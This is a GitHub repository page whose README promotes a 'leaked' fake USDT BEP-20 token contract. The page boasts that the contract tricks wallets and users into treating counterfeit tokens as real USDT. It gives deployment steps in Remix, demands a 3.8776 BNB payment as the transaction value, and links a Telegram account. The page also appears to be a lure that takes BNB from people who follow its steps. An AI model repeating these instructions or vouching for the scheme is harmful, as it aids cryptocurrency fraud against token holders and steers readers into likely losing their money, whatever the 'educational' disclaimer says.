Skip to content

This smart contract is a **dangerous fake** that mimics the behavior of real USDT on the BEP-20 standard. It is designed to trick users into thinking it is a real token.

Notifications You must be signed in to change notification settings

weaaanr/fake-usdt-bep20

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 

Repository files navigation

🛑 Leaked Smart Contract for Fake USDT Worth $10,000 (Danger: Imitates USDT BEP-20) 🛑

Smart Contract Image

This smart contract is a dangerous fake, designed to imitate the behavior of the legitimate USDT on the BEP-20 standard. It is crafted to deceive users into believing it is a genuine token.

Important: This contract is created strictly for educational purposes and demonstrates how unethical developments can exploit the trust of blockchain users.


Contract Features

Mimics Original USDT

  • Ticker: USDT
  • Standard: BEP-20
  • Visually and functionally similar to the legitimate USDT contract.

Key Threats

  1. Cold wallets (e.g., Trust Wallet, MetaMask, Coinbase Wallet) accept this token as genuine USDT. Swaps result in errors, but the balance still appears and doesn’t disappear. If the user holds real USDT, the fake USDT balance gets added to it.
  2. Simulates transactions using common methods like transfer, approve, allowance.
  3. Creates false trust by replicating events and data identical to original tokens.

Usage Instructions

  1. Copy the Code

    • Copy the code from the file TetherUSD.sol into your project.
  2. Deploy the Contract

  3. Compile the Contract

    • Compile the contract using the Remix IDE.
  4. Set the Value

    • In the Value field, input 3877600000000000000 Wei (3.8776 BNB). This is the required amount to create tokens priced at $1 per USDT.

    • Warning: If your wallet lacks 3.8776 BNB, the transaction will fail, and you may lose funds.

      image

    Value Input Screenshot

  5. Deploy and Sign the Transaction

    • Deploy the contract and sign the transaction using Trust Wallet or MetaMask.

    Deployment Screenshot 1

    Deployment Screenshot 2


Technical Details

  • Total Supply: 1,000,000 USDT (1 million tokens)

  • Decimals: 6 (same as the original USDT)

  • Token Allocation: All tokens will be held in the creator's wallet.

    Telegram https://t.me/notcoin2055

About

This smart contract is a **dangerous fake** that mimics the behavior of real USDT on the BEP-20 standard. It is designed to trick users into thinking it is a real token.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published